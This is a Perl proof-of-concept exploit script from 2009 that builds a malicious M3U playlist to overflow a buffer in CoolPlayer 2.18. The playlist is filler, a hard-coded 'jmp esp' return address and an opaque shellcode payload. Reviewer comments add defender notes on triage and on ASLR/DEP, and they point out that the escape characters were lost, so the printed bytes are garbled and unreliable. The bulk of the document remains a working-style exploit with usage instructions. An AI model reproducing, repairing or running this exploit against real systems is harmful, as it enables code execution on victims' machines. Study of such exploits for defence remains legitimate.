
# Title : CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit
# Published : 2009-12-22
# Author : data$hack


#!/usr/bin/perl
# Versions affected:        2.18
# Tested on:                Windows XP Pro SP2
# Author:                   data$hack
# Usage: expl.pl


# Proof-of-concept generator: writes a single crafted playlist file that the
# page title describes as triggering a buffer overflow in CoolPlayer 2.18's
# M3U handling. The file is the plain concatenation filler + 4-byte address +
# payload, with no playlist syntax and no line breaks.
#
# NOTE(review): none of the string literals below contain backslash escapes,
# so as shown on this page they are plain ASCII text ("x90", a trailing "n"),
# not raw bytes or a newline. The listing looks like it lost characters in
# extraction; read the layout, not the exact bytes.
#
# Defender notes:
#   - Triage: a .m3u whose content is one long run of a repeated character
#     followed by non-text data is not a playlist and should not reach a
#     media player.
#   - The return address is hard-coded for the single tested build (Windows
#     XP Pro SP2 per the header), so it depends on modules loading at fixed
#     addresses; address randomisation removes that assumption, and
#     non-executable stack/data pages (DEP) stop a payload placed in the
#     overflowed buffer from running.
#   - The lasting fix is a player version that bounds-checks playlist
#     entries; this page names only 2.18 as affected.

# Output file name, relative to the current working directory.
my $file= "exs3.m3u";

# Filler: 223 'A' characters. Presumably the distance from the start of the
# overflowed buffer to the saved return address; the page does not show how
# the figure was derived.
my $junk= "A" x 223;
# pack('V', ...) yields a 4-byte little-endian unsigned 32-bit value. The
# variable name and the author's comment indicate it is meant to replace the
# saved instruction pointer with the address of a `jmp esp` instruction; which
# module "kernel" refers to is not stated here.
my $eip = pack('V',0x7C836940);  #jmp esp from kernel

# Ten repetitions of the literal "x90" (presumably intended as a short
# no-op pad ahead of the payload; see the note on lost escapes above).
my $shellcode = "x90" x 10;

# Opaque payload appended after the pad. The page does not say what it does;
# treat it as untrusted code and analyse it only in an isolated environment.
$shellcode = $shellcode . "x33xc9xb8xa2xe0xe4x44xb1x33xdaxdfxd9x74x24" .
"xf4x5bx31x43x0ex03x43x0ex83x49x1cx06xb1x71" .
"x35x4ex3ax89xc6x31xb2x6cxf7x63xa0xe5xaaxb3" .
"xa2xabx46x3fxe6x5fxdcx4dx2fx50x55xfbx09x5f" .
"x66xcdx95x33xa4x4fx6ax49xf9xafx53x82x0cxb1" .
"x94xfexffxe3x4dx75xadx13xf9xcbx6ex15x2dx40" .
"xcex6dx48x96xbbxc7x53xc6x14x53x1bxfex1fx3b" .
"xbcxffxccx5fx80xb6x79xabx72x49xa8xe5x7bx78" .
"x94xaax45xb5x19xb2x82x71xc2xc1xf8x82x7fxd2" .
"x3axf9x5bx57xdfx59x2fxcfx3bx58xfcx96xc8x56" .
"x49xdcx97x7ax4cx31xacx86xc5xb4x63x0fx9dx92" .
"xa7x54x45xbaxfex30x28xc3xe1x9cx95x61x69x0e" .
"xc1x10x30x44x14x90x4ex21x16xaax50x01x7fx9b" .
"xdbxcexf8x24x0exabxe7xc6x9bxc1x8fx5ex4ex68" .
"xd2x60xa4xaexebxe2x4dx4ex08xfax27x4bx54xbc" .
"xd4x21xc5x29xdbx96xe6x7bxb8x79x75xe7x11x1c" .
"xfdx82x6d";


# NOTE(review): two-argument open with the mode interpolated into the name,
# an undeclared global $FILE (the script has no `use strict`), and no check of
# open's return value, so the message below prints even if the file could not
# be created.
open($FILE,">$file");
# Single write: filler, then the 4-byte address, then pad + payload.
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfullyn";